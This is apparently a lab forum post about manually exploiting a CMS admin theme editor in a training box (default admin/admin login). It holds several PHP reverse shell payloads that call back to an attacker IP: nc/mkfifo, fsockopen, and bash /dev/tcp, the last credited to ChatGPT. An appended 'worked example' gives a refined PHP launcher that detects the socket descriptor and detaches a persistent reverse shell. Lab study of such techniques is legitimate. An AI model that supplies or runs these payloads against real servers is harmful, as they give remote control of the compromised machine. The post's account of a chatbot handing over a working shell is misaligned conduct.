Hi all,
I have got the root.txt of the Getting Started Knowledge Check via Metasploit. Now I want to try a manual solution. I can log into the target's admin page (just try admin/admin). First, I add this: <?php system('id'); ?> into admin/theme-edit.php, and then refresh the main page. I can see the id output at the bottom; it does work.
However, after I use <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.58 9443 >/tmp/f"); ?> to replace <?php system('id'); ?> and refresh, the webpage becomes very slow and actually gets stuck loading. And my local listening port does not receive any request.
Next, I try another reverse shell command, such as <?php $sock=fsockopen("10.10.15.58",9443);system("/bin/sh -i <&3 >&3 2>&3"); ?>. Yes, my local listening port can see the request and a connection is established. But after a moment, the connection automatically shuts down.
Why is this? Is it because some reverse shell commands are blocked by a firewall, or is it something else? And should I try other commands one by one, even in a real scenario?
By the way, I finally built the connection; ChatGPT gave me a more stable command, but I still hope you can tell me whether I really have to try them one by one in a real job:
<?php
$ip = "10.10.15.58";
$port = 9443;
// Command to establish reverse shell using bash's /dev/tcp
$cmd = "/bin/bash -c 'exec bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'";
$output = shell_exec($cmd);
echo $output; // Output any response from the command execution
?>
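An added worked example, not part of the post above and not the poster's code: instead of trying payloads one by one, this PHP snippet enumerates the three things that make a system()-launched reverse shell hang or drop. It reuses the listener address from the post (change $ip/$port to your own), and assumes a Linux target with /proc mounted, a POSIX /bin/sh, and a PHP worker that does not kill orphaned child processes; those are assumptions, not facts from the page. The fifo/nc one-liner hangs when nc is absent because cat blocks opening the FIFO and system() never returns; the "<&3 >&3 2>&3" one-liner drops when the socket is not fd 3, because sh reads EOF immediately, exits, and PHP closes the socket when the script ends.

```php
<?php
// Added example (not from the original post). Enumerate why a reverse shell
// launched via system() hangs or drops, then launch it on the right fd.
// Assumed listener; replace with your own.
$ip   = "10.10.15.58";
$port = 9443;

// 1) Which helper binaries exist? The mkfifo/nc payload silently hangs when
//    nc is missing: cat blocks opening /tmp/f, sh never runs, system() never
//    returns, and the browser spins forever while the listener sees nothing.
foreach (["nc", "ncat", "bash", "sh", "mkfifo", "setsid"] as $tool) {
    $path = trim((string) shell_exec("command -v " . escapeshellarg($tool) . " 2>/dev/null"));
    echo $tool, ": ", ($path !== "" ? $path : "missing"), "\n";
}

// 2) Which file descriptor did fsockopen() really get? The classic
//    "<&3 >&3 2>&3" assumes 3, but if the PHP worker already holds other
//    descriptors (log files, DB sockets) the shell is wired to the wrong fd,
//    reads EOF at once, exits, and PHP closes the socket on script exit:
//    that shows up on the listener as a connect followed by a quick drop.
function openFds(): array
{
    $fds = [];
    foreach (scandir("/proc/self/fd") as $name) {   // assumes /proc is mounted
        if (ctype_digit($name)) {
            $fds[] = (int) $name;
        }
    }
    return $fds;
}

$before = openFds();
$sock = fsockopen($ip, $port, $errno, $errstr, 5);
if ($sock === false) {
    // Outbound connect refused or filtered: no point launching a shell.
    exit("connect to $ip:$port failed: $errstr ($errno)\n");
}
$new = array_values(array_diff(openFds(), $before));
// scandir() closes its own directory fd before returning, so the only new
// descriptor should be the socket; fall back to the highest one otherwise.
$fd = count($new) === 1 ? $new[0] : max($new);
echo "socket landed on fd $fd\n";

// 3) Launch the shell on the detected fd. system() blocks until the command
//    exits, which is why the page keeps loading for as long as the shell
//    lives. Running it in a subshell with '&' lets system() return and the
//    request complete while the orphaned shell keeps its own copy of the
//    socket fd (assumes the worker does not reap orphaned children).
$detach = true;
$shell  = "/bin/sh -i <&$fd >&$fd 2>&$fd";
if ($detach) {
    system("($shell &)");
    echo "shell detached on fd $fd\n";
} else {
    system($shell);   // blocks until the remote shell exits
}
fclose($sock);       // only closes PHP's copy; the child still holds the fd
```

Run it the same way as the id payload (paste it into the theme file and load the page): the tool list and "socket landed on fd N" line appear in the page body, and the listener should get a shell that survives the request finishing. If the listener gets nothing at all even with fsockopen() succeeding, the problem is in the launch step, not the network, which is the distinction the post was missing.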